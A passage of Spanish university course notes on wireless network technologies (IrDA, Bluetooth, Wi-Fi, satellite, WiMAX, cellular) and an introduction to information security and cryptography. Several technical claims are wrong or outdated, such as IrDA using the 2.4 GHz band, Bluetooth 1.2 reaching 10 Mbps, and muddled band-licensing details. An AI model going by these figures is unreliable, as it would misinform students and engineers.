capacidad, en rangos de 56kbps a 1.5Mbps hacia la red de transporte, que brinda gran confiabilidad y
disponibilidad, y garantiza calidad de servicio y ancho de banda [1].

Es una opción cara, disponible en áreas metropolitanas y de costosa extensión a zonas rurales. La
instalación es compleja y es difícil cambiar de proveedor una vez instalada. Necesita hardware dedicado
(Channel Service Unit (CSU) / Data Service Unit (DSU) y router).

Inalámbricas
En estas opciones el soporte físico es a través de ondas electromagnéticas. Existen muchas bandas del
espectro definidas para uso en redes locales (Wireless Lan - WLAN), así como para enlaces (satelitales
y celulares), utilizando radiofrecuencias (RF) y microondas.
En los últimos años se ha popularizado el uso de la frecuencia 2,4 GHz (Bluetooth y Wi-Fi) entre otras,
debido en gran parte a que son franjas del espectro de uso público que no requieren pago de licencias,
como Industrial, Scientific and Medical (ISM).
Hay otras bandas que están sujetas a licencia (MMDS, WLL, LMDS), cuya principal diferencia es que las
primeras son rangos bajos del espectro (2 a 10 GHZ) por lo que están expuestas a interferencias,
mientras que las reguladas son señales de baja potencia que tienen un alcance de más de 30km y
velocidades de hasta 115Kbps en condiciones de línea de vista [8] [9] [11].
Existen estándares de distintas organizaciones (IEEE, ETSI, IEC, entre otros) para algunas de estas
tecnologías, mientras que otras aún están en estudio (draft) [10].
Cabe considerar que hay opciones de muy corto alcance (Personal Area Networks - PAN) que si bien no
son opciones para un acceso exigente, se incluyen en esta reseña debido a que tienen amplias
prestaciones, es un buen complemento y han sido incorporadas en diversos dispositivos.
a) IrDA

____________________________________________________________________________________________________________________
UNdeC Página 69
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

La transmisión de datos utilizando luz infrarroja cuenta con un estándar [12] que define el uso de la
banda de 2.4 Ghz, con un alcance de hasta 1 metro, y velocidades de hasta 4Mbps. Recientemente
surgió una versión de 16 Mpbs que seguramente remplazará a la usada hasta ahora [12].
No deben existir obstáculos entre el emisor y el receptor, y es una opción muy barata que no requiere
pago de licencias.
b) Bluetooth
Es una especificación de la industria para PAN [25]. Tiene corto alcance (hasta 10 metros), se obtienen
velocidades de hasta 10Mbps (versión 1.2) y soporta hasta 8 dispositivos en el mismo punto de acceso.
Pueden haber objetos sólidos entre el receptor y el emisor, siempre que no sean metálicos [13].
Utiliza la banda de 2.4 Ghz, lo que inicialmente originó conflictos con otras redes inalámbricas (802.11)
ya que utiliza el mismo espectro, pero esto ha sido resuelto por los fabricantes usando distintas
frecuencias, y apoyado por la Federal Communications Commission (FCC) [46].
Sin embargo algunos países asignan frecuencias diferentes, por lo cual es posible que algunos
productos no sean operables en todos los países [14].
La seguridad esta dada con una clave única por usuario, dos claves secretas, y un número aleatorio
diferente por cada transacción [14].
Cabe mencionar a la competencia, HomeRF, una variante similar basada en el protocolo Shared
Wireless Access Protocol (SWAP) y apoyada principalmente por Intel [15].
c) Wireless Fidelity (Wi-Fi)
Es una red local inalámbrica (WLAN) de alta frecuencia, definida por los estándar IEEE 802.11x. Utiliza
frecuencias ISM de 2.4 y 5 GHZ, se logran velocidades variables de hasta 54Mbps, con un alcance de
hasta 250 mts [16].
Existen variantes a estos estándares introducidas por fabricantes, los que se mencionaran más adelante.
Se requieren puntos de acceso (Access Points - AP) en la red y tarjetas de acceso (NIC) especiales en
los dispositivos. Los dispositivos son identificados en la red mediante una MAC de forma similar que en
802.3.
Los AP son el equivalente a los HUB de red tradicional. Si bien no hay límite en la cantidad de usuarios,
muchos fabricantes limitan la cantidad de usuarios concurrentes, principalmente porque el ancho de
banda es compartido.
El alcance depende del fabricante, y como máximo hoy es de 250 mts, aunque hay implementaciones
con antenas de más potencia que logran mayor alcance [42]. Utilizan canales para conexión, existiendo
un total de 80, aunque cada país autoriza únicamente algunos. Por ejemplo, en EEUU sólo pueden
utilizarse los canales 1 a 11.
Al planificar una red Wi-Fi se debe definir con especial atención la cantidad y ubicación de los AP, ya que
esto define el máximo ancho de banda y la cantidad de usuarios soportados. El área donde hay
cobertura de AP se denomina HotSpot.
La seguridad es un tema importante, donde se debe evitar el acceso no autorizado a la red.
El estándar incluye de uso opcional el protocolo de encriptación Wired Equivalent Privacy (WEP) [31] que
ha sido ampliamente criticado porque:
el algoritmo RC4 permite utilizar claves de 40 fácilmente descifrables.
utiliza claves estáticas sin tener un método de distribución a todas las estaciones, por lo que
requiere un ingreso manual de las mismas en todos los AP.
utiliza Control Redundant Check (CRC) para la integridad, lo que no es muy seguro en términos
de criptografía.
Existen mecanismos de encriptación mejorados mediante Wi-Fi Protected Access (WPA) y el estándar
802.1x.
El 802.1x define un mecanismo de autenticación de usuarios con un servidor central de Remote
Authentication Dial-In User Service (RADIUS) [32].
Como mejora a la encriptación, WPA usa el protocolo Temporal Key Integrity (TKIP) de forma obligatoria,
implementa 802.1x y un protocolo de Autenticación Extensible (EAP) [24]. WPA utiliza parte del actual
estándar 802.11i de próxima publicación.
Una forma adicional de proteger la transmisión de datos es mediante redes privadas virtuales (VPN),
donde el usuario debe primero autenticarse frente a la WLAN para poder usar la VPN [32].
Por lo dicho anteriormente, una buena configuración de seguridad esta dada por la combinación de WPA
en un esquema de VPN, aunque siempre habrán riesgos por resolver [38].

____________________________________________________________________________________________________________________
UNdeC Página 70
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

La interoperabilidad es otro tema importante. Redes basadas en 802.11x pueden conectarse con otros
productos del mismo tipo, pero no con productos que emplean otras técnicas de modulación (por
ejemplo, Espectro Distribuido con Saltos de Frecuencia (FHSS) a diferencia del Espectro Distribuido de
Secuencia Directa (DSSS) que utiliza Wi-Fi) [16].
Es por esto importante el trabajo de organizaciones como Wireless Ethernet Compatability Alliance
(WECA) para certificar la interoperabilidad de los productos WLAN.
En la siguiente tabla se resumen las diferencias entre los estándares 802.11x.
Tipo Banda Velocidad
802.11a 5 GHz 54 Mbps
802.11b 2.4 GHz 11 Mpbs
802.11g 2.4 GHz 54 Mpbs
802.11n 2.4 GHz 133 Mpbs
El estándar 802.11g es el más reciente y es compatible con los estándares a y b. Muchos proveedores
de hardware están desarrollando productos basados en este estándar, lo que se espera haga popular su
uso a corto plazo [18].

Las frecuencias más altas del espectro son susceptibles a degradarse con objetos en el camino (path
losses), por lo que es menos robusta que las de frecuencia más bajas. Esto implica que con 802.11a
debe haber más densidad de AP que con 802.11g.
Además, los dispositivos que utilizan frecuencias altas consumen más energía, lo que impacta en la
autonomía de los mismos [26].
Por último, cabe mencionar que existen productos con ―mejoras‖ del estándar que logran mayor
performance. Si bien los mismos soportan estas mejoras además del estándar, para sacar máximo
provecho de ellas se necesita usar hardware especial en ambos lados de las conexiones [26].
A modo de ejemplo, un chipset de Texas Instruments para 802.11b logra 22Mbps de ancho de banda, el
doble del estándar, utilizando una modulación mejorada [29]. Y chipsets fabricados por Atheros para
802.11a logran velocidades de hasta 108Mbps [30].
Es interesante mencionar que existe una tecnología similar (HyperLan/2) que compite con Wi-Fi pero
generada por el Instituto de Estándares de Telecomunicaciones Europeo (ETSI), aunque no ha tenido
aún gran difusión.
Utiliza la frecuencia de 5GHz, logra velocidades de hasta 54 Mbps con un alcance de hasta 150 metros,
y soporta autenticación y encriptación [19][20].
d) Enlaces satelitales
Esta opción requiere hardware especial (una antena y un módem) y tiene un gran alcance (miles de
kilómetros) y ofrece anchos de banda variables, de hasta 1Mbps para recepción, y 100Kbps para envío
dependiendo de la conexión del usuario al operador [1].
La siguiente figura muestra una conexión típica:
Una gran ventaja es la flexibilidad de cobertura en cualquier parte del planeta, y que puede ser usada por
dispositivos fijos o móviles.
Como puntos negativos, se destaca que tiene retardos de propagación altos, el hardware y los costos de
instalación son altos, el ancho de banda es compartido con todos los usuarios del servicio por lo que la
velocidad se degrada a medida que hay más usuarios [21].

____________________________________________________________________________________________________________________
UNdeC Página 71
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Por todo esto, es una opción lenta para implementar una VPN.
f) 802.16
Es la tecnología más reciente en el mundo inalámbrico. Es un estándar para redes metropolitanas
inalámbricas (WMAN) que usan frecuencias de 10 a 66 GHz. Promete un alcance de 50km y un ancho
de banda de 70Mbps, soportando tráfico variable (según calidad de servicio). Requiere una antena en el
emisor y otra en el receptor y hardware adicional para decodificar la señal [22].
Debido a su gran ancho de banda y alcance, puede ser una alternativa comparable a tecnológicas de
acceso de banda ancha cableadas.
Existen otras tecnologías similares que también prometen, como Multichannel Multipoint Distribution
Service (MMDS) y Local Multipoint Distribution Service (LMDS) [34] [40].
g) Telefonía móvil.
Inicialmente concebidas para soporte de voz, la redes de telefonía móvil han evolucionado para ofrecer
transmisión de datos.
Dichas redes están compuestas por celdas, cuyo radio individual esta dado por el área de cobertura de
las antenas (o radio bases). El tipo de antena, su altura, ganancia y condiciones de propagación definen
el alcance de la señal. [34]
Según la zona de cobertura que se quiera ofrecer, se necesita un tipo de antena distinto [23]. Los
alcances logrados son (eventualmente usando amplificador):
2 a 300 metros con omnidireccional
algunos kilómetros con parabólica
1 kilómetro con direccional; de 2 a 3 Km con omnidireccional amplificada
50 a 60 kilómetros con parabólica o direccional amplificada

En lugares cerrados donde no logra penetrar la señal (como el metro) la cobertura se logra montando un
sistema de distribución que toma la señal del exterior y la propaga mediante antenas distribuidas
adecuadamente en el interior del sitio a cubrir.
Las redes de telefonía móvil han evolucionado rápidamente, por lo que existen diversas tecnologías: la
primer generación de telefonía móvil se era analógica, la segunda (2G y 2,5G) digital (CDPD, PCS,
GSM, GPRS), y la tercera generación (3G) agrega gran ancho de banda y confiabilidad (UMTS) [34].
Las diferencias entre las distintas generaciones son de hardware y protocolos, ya que la cobertura
depende de las antenas instaladas.
Las opciones de transmisión de datos son:
CDPD (Celular Digital Packet Data), hasta 19kbps [35]
GPRS (General Packet Radio Services), hasta 114Kbps [36]
UMTS (Universal Mobile Telephone Service), hasta 2Mbps [41]
Estas velocidades son máximas y varían según la cantidad de usuarios conectados, ya que la línea se
comparte usando diversas técnicas de modulación.
Como ventaja de la tecnología celular hay que destacar el alcance, ya que pueden llegar a cualquier
lugar del mundo, y la universalidad, ya que mediante roaming es posible utilizar servicios de otras redes
similares siendo usuario de una sola de ellas.

____________________________________________________________________________________________________________________
UNdeC Página 72
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Cabe resaltar como puntos débiles el alto costo de instalación, y que la cantidad de usuarios esta
acotada.

5.4. La alternativa Wi-Fi


A modo de resumen de las tecnologías mencionadas, se pueden comparar el ancho de banda y la
cobertura de cada opción en la siguiente figura.
Es interesante notar que las WLAN cubren solo una porción del espectro móvil, aunque utilizadas en
combinación con tecnologías celulares se puede cubrir todo el espectro, y con un ancho de banda al
usuario final muy buena (54Mpbs con Wfi-Fi) [27]. Esto puede cuestionar la revolución que se espera con
la llegada de la tecnología 3G, ya que esta promete un ancho de banda es similar (o menor), a mayores
costos de instalación.
En función del análisis hasta aquí presentado, se resumirán las fortalezas y debilidades de Wi-Fi:
Fortalezas:
Es de fácil y rápida instalación.
Brinda autonomía y privacidad adecuadas para una LAN que no tenga grandes requisitos de
seguridad.
Permite extender redes locales a zonas antes segregadas por difícil acceso o altos costos del
cableado.
La performance lograda es adecuada para el uso habitual de escritorio (con una razonable
distribución de usuarios por AP).
El costo inicial en equipos es alto, pero es compensado a largo plazo con el ahorro de pagos
mensuales a proveedores, y ante la eventual necesidad de mudanza no requiere reinversión en
infraestructura.
Existen variantes al estándar introducidos por fabricantes que muestran que esta tecnología no
ha llegado a su límite y puede seguir mejorando su rendimiento.
Es posible contar con otros dispositivos inalámbricos (como Irda o Bluetooth) en la misma red sin
interferencias.
Debilidades:
La seguridad fue inicialmente un problema, y aunque se han incorporado mejoras que por el
momento la hacen una opción confiable, no es parte del estándar y es necesario monitorear
posibles ataques.
La gestión de redes inalámbricas es compleja. No se cuenta con herramientas centralizadas
para configurar, monitorear y administrar la red, similares a las que existen para las redes
tradicionales. Esto se debe a la diversidad de fabricantes de hardware que no soportan
estándares en común.
La escalabilidad está limitada, ya que alta densidad de AP en distancias cortas reducen el ancho
de banda ya que los AP compiten por los canales.
La performance se ve degradada con la distancia al AP (a mayor distancia menor ancho de
banda).
La movilidad es limitada, restringida al alcance de los AP.
Por ser una tecnología que está madurando aún, se corre el riesgo que las futuros avances
dejen de lado la compatibilidad con dispositivos viejos (como ocurrió con 802.11b y a).
También como consecuencia de su inmadurez, en la implementación de una red puede surgir
problemas de interoperabilidad con el hardware de diversos fabricantes no apegados a los
estándares.

5.5. Conclusiones
Para brindar conectividad de alta capacidad inalámbrica a usuarios finales, actualmente Wi-Fi es una de
las opciones más adecuadas. Aunque se esperan mejoras a corto plazo, sobre todo en lo referente a la
seguridad, ofrece hoy gran ancho de banda y rápida implementación mientras que otras opciones
todavía están por llegar.
Complementada con otras tecnologías inalámbricas de largo alcance (como celulares) es posible
construir redes WAN de alto desempeño y amplia cobertura.

____________________________________________________________________________________________________________________
UNdeC Página 73
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Existen varias tecnologías inalámbricas de similar o mayor alcance que Wi-Fi (HyperLan/2, MMDS,
802.16, 3g) que prometen buen desempeño. La rápida definición de estándares y la adopción de los
mismos por la industria definirán las opciones que prevalezcan, respaldando o cuestionando la elección
actual, cualquiera sea la opción elegida.

5.6. Referencias
[1] ―Redes de computadoras (4a edición)‖, Andrew Tanenbaum, Mc Graw Hill
[2] 802.3:http://grouper.ieee.org/groups/802/3/
[3] http://www.hp.hu/ise_ticc/english/white/Gigabit.pdf
[4] ISDN: http://hea-www.harvard.edu/~fine/ISDN/index.html
[5] xDSL: http://www.etsi.org/frameset/home.htm?/technicalactiv/xDSL/xdsl.htm
[6] http://www.cis.ohio-state.edu/~jain/cis788-97/h_9rbb.htm
[7] 802.14: http://home.knology.net/ieee80214/
[8] Wireless Glossary: http://www.wildpackets.com/elements/Wireless_Glossary.pdf
[9] Wireless
specs:http://www.tifb.state.tx.us/Grants_Services/White_Papers/Wireless_Specs.pdf
[10] ―Tecnologías de Acceso‖, Ermanno Pietrosémoli, Walc2002
[11] ―Wireless MAN-Una solución bottom-up de conectividad inalámbrica‖, Gregorio Robles,
2002
[12] IrDa: http://www.irda.org
[13] Bluetooth:http://www.bluetooth.com/developer/specification/specification.asp
[14] http://www.homerf.org/data/tech/hrfwgtec.pdf
[16] ―802.11 Wireless Networks, The Definitive Guide‖, Gast, Peter, O'Reilly
[17] 802.3ea: http://www.10gea.org/
[18] Intel movile: http://www.intel.com/products/mobiletechnology/
[19] HyperLan/2: http://www.hiperlan2.com/site/home.htm
[20] HyperLan/2: http://www.etsi.org/technicalactiv/hiperlan2.htm
[21] Red satelital: http://www.starband.com
[22] 802.16: http://wirelessman.org/pub/backgrounder.html
[23] Wireless: http://www.fatamorgana.com/bertolinux/wireless/english/Wireless-HOWTO.html
[24] WPA Overview: http://www.wi-fi.org/OpenSection/pdf/Wi-
Fi_Protected_Access_Overview.pdf
[25] Bluethoot: http://www.bluetooth.org
[26] http://www.smallbusinesscomputing.com/testdrive/article.php/1496371
[27] http://news.zdnet.co.uk/communications/3ggprs/0,39020339,2123016,00.htm
[29] Texas Instrument chipset: http://presslink.dlink.com/pr/?prid=27
[30] Atheros chipset: http://www.atheros.com/pt/ar5001X.html
[31] "Weaknesses in the Key Scheduling Algorithm of RC4", Scott Fluhrer, Itsik Mantin, Adi
Shamir, http://citeseer.nj.nec.com/fluhrer01weaknesses.html
[32] Wireless LAN Security: http://www.wardrive.net/security/links
[33] http://techrepublic.com.com/5100-6265-5060773.html
[34] ETSI: http://www.etsi.org
[35] CDPD: http://connect.to/cdpd
[36] GPRS: http://www.cellular.co.za/gprs-intro.htm
[37] ―An initial analysis of performance anomalies on Wi-Fi networks‖, Andrzej Duda,
[38] Wireless LAN Security: www.airdefense.net
[39] 802.16 Technical Specifications: http://wirelessman.org/published.html
[40] MMDS: http://www.wcai.com/mmds.htm
[41] UMTS: http://www.cellular.co.za/umts.htm
[42]http://216.239.41.104/search?q=cache:zi44efltMP8J:www.spectrum.ieee.org/WEBONLY/res
ource/sep02/blue.html+Communications+Commission+(FCC)+wi-fi&hl=es

____________________________________________________________________________________________________________________
UNdeC Página 74
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

6. SEGURIDAD INFORMATICA
La seguridad informática generalmente consiste en asegurar que los recursos del sistema de información
(material informático o programas) de una organización sean utilizados de la manera que se decidió y
que la información que se considera importante no sea fácil de acceder por cualquier persona que no se
encuentre acreditada .

6.1 Introducción
Podemos entender como seguridad un estado de cualquier sistema (informático o no) que nos indica que
ese sistema está libre de peligro, daño o riesgo. Se entiende como peligro o daño todo aquello que
pueda afectar su funcionamiento directo o los resultados que se obtienen del mismo. Para la mayoría de
los expertos el concepto de seguridad en la informática es utópico porque no existe un sistema 100%
seguro. Para que un sistema se pueda definir como seguro debemos de dotar de cuatro características
al mismo:
Integridad: La información no puede ser modificada por quien no está autorizado
Confidencialidad: La información solo debe ser legible para los autorizados
Disponibilidad: Debe estar disponible cuando se necesita
Irrefutabilidad: (No-Rechazo o No Repudio) Que no se pueda negar la autoría
Dependiendo de las fuentes de amenazas, la seguridad puede dividirse en seguridad lógica y seguridad
física.
En estos momentos la seguridad informática es un tema de dominio obligado por cualquier usuario de la
Internet, para no permitir que su información sea robada.

Términos relacionados con la seguridad informática


Activo: recurso del sistema de información o relacionado con éste, necesario para que la organización
funcione correctamente y alcance los objetivos propuestos.
Amenaza: es un evento que pueden desencadenar un incidente en la organización, produciendo daños
materiales o pérdidas inmateriales en sus activos.
Impacto: consecuencia de la materialización de una amenaza.
Riesgo: posibilidad de que se produzca un impacto determinado en un Activo, en un Dominio o en toda
la Organización.
Vulnerabilidad: posibilidad de ocurrencia de la materialización de una amenaza sobre un Activo.
Ataque: evento, exitoso o no, que atenta sobre el buen funcionamiento del sistema.
Desastre o Contingencia: interrupción de la capacidad de acceso a información y procesamiento de la
misma a través de computadoras necesarias para la operación normal de un negocio.

Aunque a simple vista se puede entender que un Riesgo y una Vulnerabilidad se podrían englobar un
mismo concepto, una definición más informal denota la diferencia entre riesgo y vulnerabilidad, de modo
que se debe la Vulnerabilidad está ligada a una Amenaza y el Riesgo a un Impacto.

6.2. Objetivos
Los activos son los elementos que la seguridad informática tiene como objetivo proteger. Son tres
elementos que conforman los activos:
Información
Es el objeto de mayor valor para una organización, el objetivo es el resguardo de la información,
independientemente del lugar en donde se encuentre registrada, en algún medio electrónico o físico.
Equipos que la soportan.
Software, hardware y organización.
Usuarios
Individuos que utilizan la estructura tecnológica y de comunicaciones que manejan la información.

____________________________________________________________________________________________________________________
UNdeC Página 75
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

6.3. Análisis de Riesgos


El activo más importante que se posee es la información y, por lo tanto, deben existir técnicas que la
aseguren, más allá de la seguridad física que se establezca sobre los equipos en los cuales se
almacena. Estas técnicas las brinda la seguridad lógica que consiste en la aplicación de barreras y
procedimientos que resguardan el acceso a los datos y sólo permiten acceder a ellos a las personas
autorizadas para hacerlo.
Existe un viejo dicho en la seguridad informática que dicta: "lo que no está permitido debe estar
prohibido" y esto es lo que debe hacer ésta seguridad lógica.
Los objetivos para conseguirlo son:
Restringir el acceso (de personas de la organización y de las que no lo son) a los programas y
archivos.
Asegurar que los operadores puedan trabajar pero que no puedan modificar los programas ni los
archivos que no correspondan (sin una supervisión minuciosa).
Asegurar que se utilicen los datos, archivos y programas correctos en/y/por el procedimiento
elegido.
Asegurar que la información transmitida sea la misma que reciba el destinatario al cual se ha
enviado y que no le llegue a otro.
Asegurar que existan sistemas y pasos de emergencia alternativos de transmisión entre
diferentes puntos.
Organizar a cada uno de los empleados por jerarquía informática, con claves distintas y
permisos bien establecidos, en todos y cada uno de los sistemas o aplicaciones empleadas.
Actualizar constantemente las contraseñas de accesos a los sistemas de computo.

6.4. Puesta en marcha de una política de seguridad


Generalmente se ocupa exclusivamente a asegurar los derechos de acceso a los datos y recursos con
las herramientas de control y mecanismos de identificación. Estos mecanismos permiten saber que los
operadores tiene sólo los permisos que se les dio.
La seguridad informática debe ser estudiada para que no impida el trabajo de los operadores en lo que
les es necesario y que puedan utilizar el sistema informático con toda confianza. Por eso en lo referente
a elaborar una política de seguridad, conviene:
Elaborar reglas y procedimientos para cada servicio de la organización.
Definir las acciones a emprender y elegir las personas a contactar en caso de detectar una
posible intrusión
Sensibilizar a los operadores con los problemas ligados con la seguridad de los sistemas
informáticos.
Los derechos de acceso de los operadores deben ser definidos por los responsables jerárquicos y no por
los administradores informáticos, los cuales tienen que conseguir que los recursos y derechos de acceso
sean coherentes con la política de seguridad definida. Además, como el administrador suele ser el único
en conocer perfectamente el sistema, tiene que derivar a la directiva cualquier problema e información
relevante sobre la seguridad, y eventualmente aconsejar estrategias a poner en marcha, así como ser el
punto de entrada de la comunicación a los trabajadores sobre problemas y recomendaciones en término
de seguridad.

6.5. Las amenazas


Una vez que la programación y el funcionamiento de un dispositivo de almacenamiento (o transmisión)
de la información se consideran seguras, todavía deben ser tenidos en cuenta las circunstancias "no
informáticas" que pueden afectar a los datos, las cuales son a menudo imprevisibles o inevitables, de
modo que la única protección posible es la redundancia (en el caso de los datos) y la descentralización -
por ejemplo mediante estructura de redes- (en el caso de las comunicaciones).
Estos fenómenos pueden ser causados por:
Un operador: causa del mayor problema ligado a la seguridad de un sistema informático (por que no
le importa, no se da cuenta o a propósito).
Programas maliciosos: programas destinados a perjudicar o a hacer un uso ilícito de los recursos del
sistema. Es instalado (por inatención o maldad) en el ordenador abriendo una puerta a intrusos o

____________________________________________________________________________________________________________________
UNdeC Página 76
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

bien modificando los datos. Estos programas pueden ser un virus informático, un gusano informático,
un troyano, una bomba lógica o un programa espía o Spyware.
Un intruso : persona que consigue acceder a los datos o programas de los cuales no tiene acceso
permitido (cracker, defacer, script kiddie o Script boy, viruxer, etc.).
Un siniestro (robo, incendio, por agua) : una mala manipulación o una malintención derivan a la
pérdida del material o de los archivos.
El personal interno de Sistemas. Las pujas de poder que llevan a disociaciones entre los sectores y
soluciones incompatibles para la seguridad informática.

6.6. Técnicas de aseguramiento del sistema


Codificar la información: Criptología, Criptografía y Criptociencia, contraseñas difíciles de
averiguar a partir de datos personales del individuo.
Vigilancia de red.
Tecnologías repelentes o protectoras: cortafuegos, sistema de detección de intrusos - anti-
spyware, antivirus, llaves para protección de software, etc. Mantener los sistemas de información
con las actualizaciones que más impacten en la seguridad.
Criptología
La criptología es el estudio de los criptosistemas: sistemas que ofrecen medios seguros de comunicación
en los que el emisor oculta o cifra el mensaje antes de transmitirlo para que sólo un receptor autorizado
(o nadie) pueda descifrarlo. Sus áreas principales de interés son la criptografía y el criptoanálisis, pero
también se incluye la esteganografía como parte de esta ciencia aplicada. En tiempos recientes, el
interés por la criptología se ha extendido también a otras aplicaciones aparte de la comunicación segura
de información y, actualmente, una de las aplicaciones más extendidas de las técnicas y métodos
estudiados por la criptología es la autenticación de información digital (también llamada firma digital).
A la técnica de transformación de datos de forma de hacerlos inútiles frente a intrusos se le denomina
―criptografía‖, al arte de desbaratar estas técnicas se le llama ―criptoanálisis‖ y conjuntamente se les
conoce como ―criptología‖. Aunque el término "criptología" no está recogido todavía en el Diccionario de
la Real Academia (siendo una traducción directa de la palabra inglesa Cryptology) lo cierto es que es de
uso común entre los expertos en seguridad de comunicaciones.
Coloquialmente, se consideran los términos encriptar y cifrar como sinónimos, al igual que sus
respectivas contrapartes, desencriptar y descifrar, pero no ocurre lo mismo con el término codificar. No
obstante, se debe utilizar el término cifrar en vez de encriptar, ya que se trata de un anglicismo de los
términos ingleses encrypt y decrypt. Por definición codificar significa expresar un mensaje utilizando
algún código, pero no necesariamente de forma oculta, secreta o inenteligible; escribir en idioma español
implica el uso de un código, que será comprensible para los hispanohablantes pero no tanto para
quienes no dominan el idioma; la matemática y la lógica tienen sus propios códigos, y en general existen
tantos códigos como ideas.
El procedimiento utilizado para cifrar datos se realiza por medio de un algoritmo al cual se le puede
considerar como una función matemática. Por lo tanto, un algoritmo de cifrado es una fórmula para
desordenar una información de manera que ésta se transforme en incomprensible, usando un código o
clave (en ocasiones, más de una). Los mensajes que se tienen que proteger, denominados texto en
claro, se transforman mediante esta función, y a la salida del proceso de puesta en clave se obtiene el
texto cifrado, o cifrograma. En muchos casos, existe un algoritmo de descifrado encargado de reordenar
la información y volverla inteligible, pero no siempre es así. Cuando existen ambas funciones, una para
cifrar y otra para descifrar, se dice que el sistema criptográfico es de dos vías o reversible (a partir de un
mensaje en claro se puede obtener uno cifrado y a partir de éste se puede obtener el mensaje original),
mientras que cuando no existe una función para descifrar se dice que el sistema es de una sola vía (a
partir de un mensaje cifrado no es posible obtener el mensaje en claro que lo generó; la aplicación de
esto es, por ejemplo, para el almacenamiento de contraseñas).
La transformación de datos provee una posible solución a dos de los problemas de la seguridad en el
manejo de datos. El problema de la privacidad y el de la autenticación, evitando que personas no
autorizadas puedan extraer información del canal de comunicación o modificar estos mensajes.
Desde el punto de vista histórico los métodos de cifrado se han dividido en dos categorías: cifradores de
sustitución y cifradores de transposición. En un cifrador de sustitución, cada letra o grupo de letras se
sustituye por otra letra o grupo de letras para disfrazarlas. Los cifradores de sustitución preservan el
orden de los símbolos del texto en claro, pero los disfrazan. El cifrador de sustitución más antiguo que se
conoce es el cifrador de César, atribuido a Julio César. En este método, A se representa por D, B por E,

____________________________________________________________________________________________________________________
UNdeC Página 77
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

C por F, y así cada letra se sustituye por la que se encuentra tres lugares delante de ella, considerando
que luego de la Z vuelve a comenzar por la A. Una variante del cifrador de César es permitir que el
alfabeto cifrado se pueda desplazar k letras (no sólo 3), convirtiéndose k en la clave.

Criptografía
La criptografía (del griego kryptos, «ocultar», y grafos, «escribir», literalmente «escritura oculta») es el
arte o ciencia de cifrar y descifrar información utilizando técnicas matemáticas que hagan posible el
intercambio de mensajes de manera que sólo puedan ser leídos por las personas a quienes van
dirigidos.
Con más precisión, cuando se habla de esta área de conocimiento como ciencia se debería hablar de
criptología, que engloba tanto las técnicas de cifrado, la criptografía propiamente dicha, como sus
técnicas complementarias: el criptoanálisis, que estudia los métodos que se utilizan para romper textos
cifrados con objeto de recuperar la información original en ausencia de la clave.
La finalidad de la criptografía es, en primer lugar, garantizar el secreto en la comunicación entre dos
entidades (personas, organizaciones, etc.) y, en segundo lugar, asegurar que la información que se
envía es auténtica en un doble sentido: que el remitente sea realmente quien dice ser y que el contenido
del mensaje enviado, habitualmente denominado criptograma, no haya sido modificado en su tránsito.
Otro método utilizado para ocultar el contenido de un mensaje es ocultar el propio mensaje en un canal
de información, pero en puridad, esta técnica no se considera criptografía, sino esteganografía. Por
ejemplo, mediante la esteganografía se puede ocultar un mensaje en un canal de sonido, una imagen o
incluso en reparto de los espacios en blanco usados para justificar un texto. La esteganografía no tiene
porqué ser un método alternativo a la criptografía, siendo común que ambos métodos se utilicen de
forma simultánea para dificultar aún más la labor del criptoanalista.
En la actualidad, la criptografía no sólo se utiliza para comunicar información de forma segura ocultando
su contenido a posibles fisgones. Una de las ramas de la criptografía que más ha revolucionado el
panorama actual de las tecnologías informáticas es el de la firma digital: tecnología que busca asociar al
emisor de un mensaje con su contenido de forma que aquel no pueda posteriormente repudiarlo.

Conceptos
En la jerga de la criptografía, la información original que debe protegerse se denomina texto en claro. El
cifrado es el proceso de convertir el texto plano en un galimatías ilegible, denominado texto cifrado o
criptograma. Por lo general, la aplicación concreta del algoritmo de cifrado (también llamado cifra) se
basa en la existencia de una clave: información secreta que adapta el algoritmo de cifrado para cada uso
distinto. cifra es una antigua palabra arábiga para el cero, en la antigüedad cuando Europa empezaba a
cambiar del sistema de numeración romano al arábigo, se desconocía el cero por lo que este resultaba
misterioso, de ahí probablemente cifrado significa misterioso. Las dos técnicas más básicas de cifrado en
la criptografía clásica son la sustitución (que supone el cambio de significado de los elementos básicos
del mensaje -las letras, los dígitos o los símbolos-) y la trasposición (que supone una reordenación de las
mismas); la gran mayoría de las cifras clásicas son combinaciones de estas dos operaciones básicas. El
descifrado es el proceso inverso que recupera el texto plano a partir del criptograma y la clave. El
protocolo criptográfico especifica los detalles de cómo se utilizan los algoritmos y las claves (y otras
operaciones primitivas) para conseguir el efecto deseado. El conjunto de protocolos, algoritmos de
cifrado, procesos de gestión de claves y actuaciones de los usuarios, en su globalidad es lo que
constituyen un criptosistema, que es con lo que el usuario final trabaja e interactúa.
Existen dos grandes grupos de cifras: los algoritmos que utilizan una única clave tanto en el proceso de
cifrado como en el de descifrado y los que utilizan una clave para cifrar mensajes y una clave distinta
para descifrarlos. Los primeros se denominan cifras simétricas o de clave simétrica y son la base de los
algoritmos de cifrado clásico. Los segundos se denominan cifras asimétricas, de clave asimétrica o de
clave pública y clave privada y forman el núcleo de las técnicas de cifrado modernas.
En el lenguaje cotidiano, la palabra código se usa de forma indistinta con cifra. En la jerga de la
criptografía, sin embargo, el término tiene un uso técnico especializado: los códigos son un método de
criptografía clásica que consiste en sustituir unidades textuales más o menos largas o complejas,
habitualmente palabras o frases, para ocultar el mensaje; por ejemplo, "cielo azul" podría significar
"atacar al amanecer". Por el contrario, las cifras clásicas normalmente sustituyen o reordenan los
elementos básicos del mensaje -letras, dígitos o símbolos-; en el ejemplo anterior, "rcnm arcteeaal aaa"
sería un criptograma obtenido por transposición. Cuando se usa una técnica de códigos, la información
secreta suele recopilarse en un libro de códigos.

____________________________________________________________________________________________________________________
UNdeC Página 78
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Con frecuencia los procesos de cifrado y descifrado se encuentran en la literatura como encriptado y
